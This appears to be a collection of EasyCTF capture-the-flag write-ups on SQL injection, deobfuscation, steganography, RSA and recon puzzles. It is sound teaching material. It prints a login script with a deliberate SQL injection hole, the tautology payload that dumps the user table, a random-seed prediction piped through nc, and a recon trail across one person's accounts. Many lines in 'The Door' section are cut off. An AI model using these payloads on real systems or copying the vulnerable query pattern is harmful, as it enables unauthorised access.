hiddeninplainsight

80 - Injection
Written by Michael Zhang

Problem
This site seems to have some information we need. Unfortunately, it's protected by a login page. Help us get through the
login system!
Website - Source

Hint
You might want to study up on some SQL syntax. How can we modify the query so it will always return true?

Solution
Examine this bit of injection.phps carefully:

<?php
error_reporting(0);
if (isset($_POST['submit']) && isset($_POST['username']) && isset($_POST['password']) && $_POST['submit'] == "Login") {
echo "<table border='1'><tr><th>username</th><th>message</th></tr>";
$username = $_POST['username'];
$password = $_POST['password'];
mysql_connect("xxxxxxxxx", "xxxxxxxxx", "xxxxxxxxx");
@mysql_select_db("xxxxxxxxx") or die("can't select database");
$query = "SELECT * FROM `xxxxxxxxx` WHERE username='$username' AND password='$password'";
$result = mysql_query($query);
while($row = mysql_fetch_array($result)) {
echo "<tr><td>".$row['username']."</td><td>".$row['message']."</td></tr>";
}
echo "</table>";
}
?>

Notice the query string that fetches the data from the database.

$query = "SELECT * FROM `xxxxxxxxx` WHERE username='$username' AND password='$password'";

If we set username to ' OR 1=1 OR ' , then the query string would look like

$query = "SELECT * FROM `xxxxxxxxx` WHERE username='' OR 1=1 OR '' AND password='whatever'";

Since 1 always equals 1, the condition will always be satisfied, so the script pulls all rows out of the database.
username

message

admin

hi

flag

kids_dont_code_like_this_at_home

Flag
kids_dont_code_like_this_at_home

90 - Obfuscation 1
Written by Emily Leng, Writeup by MegaAbsol

Problem
Free points guyz.
Obfuscation is changing variables and statements in a code so that it still performs the desired functions but is harder to
read by humans. This makes it harder for people who are not supposed to see your code to understand your code. Try your
hand at the following Python deobfuscation exercise:
Input file

Hint
Think backwards, reverse the encryption.

Solution
Actually, there's no need to "think backwards." We only need to look at a little bit of the code to get the gist of it.

def enc(c,k): return chr(((ord(k) + ord(c)) % 26) + ord('A'))

It seems scary, but it looks to me like it's cycling through characters. Wait... cycling? Then what happens if we repeatedly
encrypt our data? Let's edit the code a bit:

from itertools import starmap, cycle

def mystery(a, b):
a = filter(lambda _: _.isalpha(), a.upper())
def enc(c,k): return chr(((ord(k) + ord(c)) % 26) + ord('A'))
return "".join(starmap(enc, zip(a, cycle(b))))
text = "SWQHRGZZUSSWWBJWMRQTMRYVWVXJMADMKICSVBZCZXMENGJLVWEUDUQYVSEMKRWUBFJF"
apple = "FOODISYUMMY"
for i in range(26):
text = mystery(text, apple)
print (text)

On the second-last line of output, look what we get:

NICEJOBFIGURINGOUTWHATTHISPROGRAMDOESTHEFLAGISVINEGARISTHEBESTCIPHER

Flag
VINEGARISTHEBESTCIPHER

90 - Pixelated
Written by Emily Leng, Writeup by Jester

Problem

Hint
Did you know you can do arithmetic with images too?

Solution
This problem is quite simple. The hint gives us an extremely useful website that allows us to perform "arithmetic" on the
images provided.
After converting the pngs to the needed format on the website, you can simply try it out until you get a QR code. (Upload
the images on a website) After trying all of them, we find that the correct QR code is actually XOR. Afterwards, you can
scan the QR code, which links you to the flag.

Flag
pixelsmatterinQRs

95 - Brachiosaurus
Written by Emily Leng, Writeup by MegaAbsol

Problem
Here's something a bit harder.

Hint
Is this jpg really a jpg?

Solution
Since this seems to be a steg problem, we open it in a hex editor. I used HxD. Scroll to the bottom of the file, and we see
lots of "not suspicious" strings, as well as PK's (50 4B). PK is a zip file. We find the first instance of "PK" in the plaintext,
and copy everything from there. We take the copied text and make it into a zip file. Looking into our new zip file, we see a
"not suspicious" folder filled with .SHORT.OUT files, from 1-25. There also is a "whatAFineKeyThisIs" file. This seems like
something, so we look into it.
In this file, it says:

my favorite numbers are seven and three.

gaf cnrvp qnjkfs hz zfufqgffq

The bottom seems suspicious, and looks like some kind of cipher. Plugging it into quipqiup, we get:

the lucky number is seventeen

We then look into file 17. It seems like a bunch of meaningless text, but when we CTRL+F "answer," we find:

ANSWER4Y0UREFF0RTSISC1PH3RSANDKRYPT0

Flag
C1PH3RSANDKRYPT0

100 - Project Eratosthenes

Written by Michael Zhang, Writeup by Emily Leng

Problem
The first 5 primes are 2, 3, 5, 7, and 11. The 2nd, 3rd, 5th, 7th, and 11th primes are (respectively) 3, 5, 11, 17, and 31. The
sum of these primes is 67. Let Q(n) be the sum of the k th prime where k is the first n prime numbers, as shown
above. Then Q(5) = 67 .
It can be confirmed that Q(35) = 11735 and Q(85) = 107591 .
If args = [M,N] , find Q(M) + Q(N) , using the python editor.

Hint
Find an efficient way to generate primes.

Solution
def isPrime(num):
# Checks for primality & returns a boolean.
if num == 2:
return True
elif num < 2 or not num % 2: # even numbers > 2 not prime
return False
# factor can't be larger than the square root of num
for i in range(3, int(num ** .5 + 1), 2):
if not num % i: return False
return True
def generatePrimes(n):
# Returns a list of prime numbers with length n
primes = [2,]
noOfPrimes = 1
testNum = 3 # number to test for primality
while noOfPrimes < n:
if isPrime(testNum):
primes.append(testNum)
noOfPrimes += 1
testNum += 2
return primes
l = generatePrimes(10000)
def q(n):
tot = 0
l2 = l[:n]
for x in l2:
tot+= l[x-1]
return tot
print (q(args[0]) + q(args[1]))

Flag
n0t_pr0jekt_o1ler_but_s1mil4r

100 - Palindrama
Written by Michael Zhang, Writeup by Emily Leng

Problem
Given a string stored in args[0] , find the longest palindrome inside the string, ignoring the punctuation and spacing during
calculations, but including them in the final result.
For example, I did roar again, Niagara! ... or did I? returns I did roar again, Niagara! ... or did I
Notice how the question mark was not part of the palindromic string, so it was not included in the answer (and neither
should trailing spaces or new lines).

Hint
Python makes palindrome testing easy (after you remove punctuation, that is) with its ability to reverse strings!

Solution
import string
exclude = set(string.punctuation)
longest = ''
xindex, yindex = 0,0
for x in xrange(0,len(args[0])):
for y in xrange(0,len(args[0])):
origStr = args[0][x:y]
if origStr[0:1] in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
newStr = ''.join(ch for ch in origStr if ch not in exclude).replace(" ","").lower()
if newStr == newStr[::-1] and len(newStr) > len(longest):
longest = newStr
yindex = y
xindex = x
print args[0][xindex:yindex].strip(),

Flag
did_you_use_python's_[::-1]_notation?

120 - Fast Math

Written by Michael Zhang, Writeup by Emily Leng

Problem
Can you beat the Jung? Try your hand at some fast math at python.easyctf.com:10660 !

Hint
How can you solve problems quickly?

Solution
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("python.easyctf.com", 10660))
response = s.recv(1024)
response = response.translate(None, "abcdefghijklmnopqrstuvwxyz ")
while s:
s.send(str(eval(response)))
response2 = s.recv(1024)
print response2
break

Flag
congratz_u_just_beat_the_jung!!1!

130 - Reversing 2 (TODO)

150 - Ghoti
Written by Michael Zhang
Writeup by Jester

Problem
Haaaalppp I can't pronounce this word. What could this image mean?

Hint
Look for clues in the file. The file appears corrupted, but maybe it still contains some important information.

Solution
First, to solve this problem, we need to find clues (notice the s). There are 2 clues needed to solve the problem.
We can obtain both clues quite easily. The first one is to simply open the picture as a rar file. Inside the rar file, we find a file
called sh58, which, if we open with notepad, contains the ciphertext 1e95153b6c941098227a4b08d9d74cb9d7b9387f83c74097 .
To obtain the second clue, we must open the jpg with a hex editor (I used HxD). Then, Ctrl+F "flag", in which it says "here's
a hint at the flag: tetraodontidae"
Given these two clues, we can now decrypt the ciphertext. A quick google of "tetraodontidae" reveals a type of encryption
called "blowfish," which requires a key and ciphertext. Perfect! After using many different websites, the one that worked for
me was http://webnet77.com/cgi-bin/helpers/blowfish.pl
Enter "tetraodontidae" as the key and "1e95153b6c941098227a4b08d9d74cb9d7b9387f83c74097" as the ciphertext, and
you get the flag!

Flag
bl0w_fish_so_s3cret_

160 - Obfuscation 2
Written by Austin Zhou
Writeup by Jester

Problem
This jumbled mess has been left for you... source

Hint
Are there any ways to make this code more readable?

Solution
Go to http://jsbeautifier.org/ Copy paste the code into the box, then "beautify" it. Copy the "beautified" code.
Open up a web browser (tested on google chrome) and open up console. (F12 then click on "Console") Copy paste the
code into the console and press enter. It should say "The flag is near." On the right side of the line, however, there is
something that says "VMXXX:X" (X is an arbitrary number, can vary)
Click it and it shows a list of variables and their values, and you get the flag!

Flag
0bfuscaTion fTw

180 - The Door

Step 1.
As with all reverse engineering questions, the first question you need to ask yourself is what do I want this program to do that it cur
In the case of door.c, we need to run this line of code:
printf("Good detective work, your flag is: %d_%d\n",flagFunc(4407091,(int)(137.0*(secretKey)/15.2)),flagFunc(1992,197));
Specifically, we need to call the function "flagFunc", so the next step is finding out where flagFunc is defined:
twochainz flagFunc=generateFlagFunc(secretKey);

Step 2.
Ok, so what exactly is this 'twochainz' type (not Tauheed Epps)-- at the top of our c code we see this typedef:
typedef int (*twochainz)(int,int);
So now we know that flagFunc is a pointer to a function which takes two integer arguments and returns an integer (type twochainz), whic

Step 3.
Next on the list we have got to see where the point has come from, so lets go into 'generateFlagFunc' to find out.
Before we enter into generateFlagFunc, we must look at the argument that is passed, 'secretKey', which is passed to generateDouble as t
Many (inexperienced) reverse engineers would start at the top and work their way down, but this is foolish in reverse engineering. We o
Alrighty, so the looks like this:
return (twochainz)buf;
Now we know that buf must contain a pointer to our magic function, so lets find where buf is first defined to see where our code is com
unsigned short * buf=(unsigned short *)malloc(len+1);
Step 4.
Sweet, so now we know that the code between the definition of buf and its return must transform and empty buffer of unsigned shorts int
int len=sizeof(secretMsg)/4;//this is on the first line, but we need it for the loop
for(int i=0;i<len/2;i++)
{
buf[i]=(unsigned short)(roundVal(secretMsg[i]*seed-1));
seed+=1.0;
}
Step 5.
Alright, so in here its filling in the values of buf using seed and elements of the array 'secretMsg'. We don't know seed, but we do kn
buf[0]=secretMsg[0]*seed-1;
buf[0]=413.414948585843*seed-1;
Therefore, the first two bytes of the function flagFunc must be equal to 413.414948585843*seed-1 (since the first two bytes of buf are
Step 6.
Good stuff Carter, but what the hell good does that do us?

If you know anything about C, reverse engineering or x86, you'll know that all C functions must start by pushing the caller function's
Specifically, all C functions in x86 must start with these two instructions:
push rbp # push base frame pointer to stack
mov rbp, rsp # move stack pointer into base frame pointer

Therefore, the first few bytes for our function must be the hexadecimal representation for these two instructions when they are assembl
0x55 for 'push rbp' (One Byte)
0x48,0x89,0xE5 for 'mov rbp, rsp' (Three Bytes)
Hence, the first two bytes of the buffer must be 0x55 and 0x48, and buf[0] must be the short which is represented by these two bytes, s
Step 7.
YAY! Now all we need to do is some algebra to find seed:
buf[0]=0x4855
buf[0]=413.414948585843*seed-1 //See step 5
0x4855=413.414948585843*seed-1
0x4855+1=413.414948585843*seed
(0x4855+1)/413.414948585843=seed
seed=(0x4855+1)/413.414948585843
seed=44.7927682909
Step 8.
Ok, now that we know what see must be, lets figure out where see comes from so we can make sure it will be 44.7927682909:
double secretKey;
scanf("%lf",&secretKey);

twochainz flagFunc=generateFlagFunc(secretKey);
As you can see, its just the double value we entered for secret key, so now lets compile door.c and plugin 44.7927682909 for our (secre
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\Carter\Desktop\tcc\door>door
--- DOOR! DOOR! WHO STOLE THE DOOR? --In order to identify who stole the door, please enter the secret key below
Secret key: 44.7927682909
Good detective work, your flag is: 1992_-2

C:\Users\Carter\Desktop\tcc\door>
Step 9:
WE GOT THE FLAG!@#%!#@%!@%@%!@#%!@%!%!!!!!

Step 10 - Regret:
As you are probably guessing, there is an easier way to do this, and to do this we must look at the question - "Who stole the door". If
So, the secret key is the double value represented by the 8 bytes below:
40 46 65 79 6E 6D 61 6E
Or in ascii as: @Feynman
yup, it was pretty damn easy.
-- Addenda: Revised Step 1 --

Step 1: You make your console cost the most, you beat your chest and proudly boast--despite no good exclusive games, you make a bunch r
Then ignore our need to play online
Don't make it fun like Xbox Live
Use Blue Ray, Which I don't need
Now you're getting your ass kicked by the Wii
Sony, you went wrong, with your PS3
I'll just keep playing my 360
Hope this song has helped, you understand
Now you know, How You Killed Your Brand.
Shouts to my fave pen pal Marc E. Mayer (http://www.msk.com/attorneys/Marc_Mayer)

180 - Evil Guess (TODO)

180 - RSA
Written by Austin Zhou, Writeup by Jester

Problem
You stumble upon a RSA encrypted message that looks different... All you know is the public key. Can you decrypt the
message? Data

Hint
The message is about RSA.

Solution
To solve this problem, we must (obviously) first understand RSA. RSA encryption utilizes extremely large numbers to
encrypt messages. A message, m, is converted to hex/decimal, then modular arithmetic is performed using a public key
and public exponent.
To decrypt, we must obtain the private key.To do this, we must factor the public key. Normally, this would be impossible, but
since the public key is relatively small, it can be done.
So, we get factors p and q:

p = 1398023584459
q = 29065965967667

We also need the totient, which is (p-1) * (q-1).

totient = 40634905927850661848135028

The private key, d, is equivalent to the inverse mod of the public key and the totient.
Then, we also need the public exponent. But wait! That's not provided in the problem.
Even after writing a script to brute force it, it would be nearly impossible to find the flag among the huge piles of ascii text...
or is it?
This is where the hint comes in. It says "The message is about RSA." Clearly, it is quite an obvious (and worthless) hint at
first glance.
Using this surprisingly useful hint, we can write a python script that brute forces the public key, and if the outputted string
has "rsa" in it, then it will print it out.
Our code:

def egcd(a, b): #inverse mod function (its not built in :O)
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)

def modinv(a, m): #inverse mod function

g, x, y = egcd(a, m)
if g != 1:
return -1
else:
return x % m
c = int("ac470f7350ea67d7a0696",16)
p = 1398023584459
q = 29065965967667
while 1: #loops infinitely until flag is found
d = modinv(i,(p-1)*(q-1)) #uses inverse mod
if(d!=-1):
answer = (hex(pow(c,d,p*q))) #turns into hex after powmod
answer = answer[2:-1]
if(len(answer)%2==1):
answer = '0' + answer
xyzwhatever = answer.decode("hex") #turns hex to ascii
if("rsa" in xyzwhatever.lower()): #prints flag if "rsa" is in it (.lower() prevents case sensitivity)
print(i) #prints public exponent used
print xyzwhatever #prints possible flags

After running the code, we get the flag!

Flag
rsa_2_easy

200 - Guessing is hard

Written by Jacob Edelman, Writeup by MegaAbsol

Problem
We really love guessing games. Try and get the flag at python.easyctf.com:10663!
source

Hint
No hint for this problem. :P

Solution
We wrote the program on the shell, and I forgot the code, so rewrote it here to the best of my ability...
At first glance, this problem seems unsolvable. After all, it's "truly random..." or is it? Taking a quick look into how random
works, we note that if no seed is provided random will use long(time.time()*256) as seed (int or long, depending on your
version). We also note that, since this finds integer amount of seconds, the ping time and code run time is irrelevant. I don't
know if our system has os.urandom or not, but I don't really care and I can just seed random manually.
Using this, we have our preliminary code:
Planning it out:

import random, time

random.seed(long(time.time()*256))
print(random.random())

We also need to connect to the server, so we have:

Almost there:

import random, time

import os
random.seed(long(time.time()*256))
os.system('echo '+str(random.random())+' | nc python.easyctf.com 10663')

But it doesn't work!!? Why not? After closer inspection, we note that random.random is a float. Float outputs only a few
decimal points, but we need an exact time. After searching it up on the internet, we find a format string which can show
more decimal points. I chose 60.
Final Code:

import random, time

import os
random.seed(long(time.time()*256))
os.system('echo '+str('%.60f'%random.random())+' | nc python.easyctf.com 10663')

We run it, and get the flag!

Flag:
wow_the_random_module_in_python_is_pretty_easy_to_hax

Note: Since the shell is down you probably won't be able to do it.

230 - failedxyz
Written by Michael Zhang

Problem
My name is Michael Zhang.

Hint
This is a recon problem. Clues are scattered over the internet, and you have to piece them together to solve the problem.
THIS IS INSANELY HARD. If you solve this problem, you are required to write a write-up and send it (using the email you
signed your team up with) to failed.down@gmail.com.

Solution
This problem had 4 parts. These 4 parts could be found by scouring all of my accounts and looking for flag-related clues.
Obtaining my phone number and address didn't get you anywhere as far as solving the problem.

Part 1
On my YouTube channel at http://youtube.com/user/failedxyz, one of the videos is called ice - L (Cytus). In the description
of the video you'll find these lines:

Part One
If you're looking for something, "failed_up_".

Another way to reach this video is from my MuseScore profile, which is linked on multiple sites across the internet. One of
my transcriptions links to the above video.

Part 2
My personal site would be a good place to look for clues. In this case, the source code was publicly available on GitHub, so
instead, the clue was hidden inside the profile image on the top right.

The file end signature for JPEG files is FF D9 , so anything after this signature will not be a part of the JPEG. Moving
everything after FF D9 to a new .rar file (notice the Rar! file signature indicating that this is a rar archive), we find a file
called sh58 inside. This file contained the following contents:

check out puffdonut's dulles airport rendition in minecraft! fehxNkfgzX96S1P7vwDtew==

It turns out that this hash was incorrect, so it was replaced with dE+0bYbrewc= , which can be found on the clarification page.
A quick Google on puffdonut dulles airport minecraft produces the following URL:

http://www.minecraftforum.net/forums/mapping-and-modding/maps/1528032-dulles-airport-v6

On page 2 of the comments, notice a post by failedxyz that says

Nice job! Your video was amazing.Will you do any more maps of real places?
key: sonicetherunbelievableshader

We now have a key and a ciphertext. What is the algorithm? That's not too hard to find. Under my Minecraft Forum profile
(the same site as before), my interests are DES encryption.
At this point, any online decrypting service would work. Using the key sonicetherunbelievableshader and the ciphertext
dE+0bYbrewc= , we get is_the_ as the second part of the flag.

Part 3
This one is simple. You can reach http://projectnebula.org/failosu through many methods including:
a link on my Twitter (which I never use)
a link from my osu! profile
Click on any of the songs listed and browse the source code. Close inspection of this site reveals:

<script type="text/javascript">
/*
Version 1
+ Loading WOsu (http://wosu.ga)
Upcoming
+ Slider ticks
+ Auto replay based on map
+ score and combo calculations
*/

The third part can be found at the bottom of http://wosu.ga.

</script>
<!-- Part 3: best_fail_ -->
</body>
</html>

Part 4
Most people found this first. In my Twitch bio, I included a string "2*impossible". This refers to the Impossible Duet.
Performing a Google search on failedxyz impossible duet brings us to this recording. The recording has a link to sheet
music, which was available at https://sites.google.com/site/fdetzl/impossible-duet.
This site looks pretty innocent, but under the Sitemap view, there's a page called Part 4, which has the following contents:

Fish duet is pretty good too. You might want to know this: 5ktxaA0e8yaL5tvrXjfKjM4ZYGmgVtSvsS7yZoH9udI=

Fish duet refers to twofish encryption. Again, the hash is given to you (the hash was found to be broken in the middle of the
competition, but this time it was changed directly on the site).
So we already have a ciphertext and encryption method! Where's the key? Well, twofish encryption keys must be either 16,

24, or 32 characters in length. Notice that the title of the page, fdetzl , has a length of 6, which perfectly divides into 24.
The key is fdetzlfdetzlfdetzlfdetzl . Later a hint was released revealing that the key was actually a repeated phrase.
Using this information, we find that the final piece of the flag is:

you_are_ctf_champion

Flag
failed_up_is_the_best_fail_you_are_ctf_champion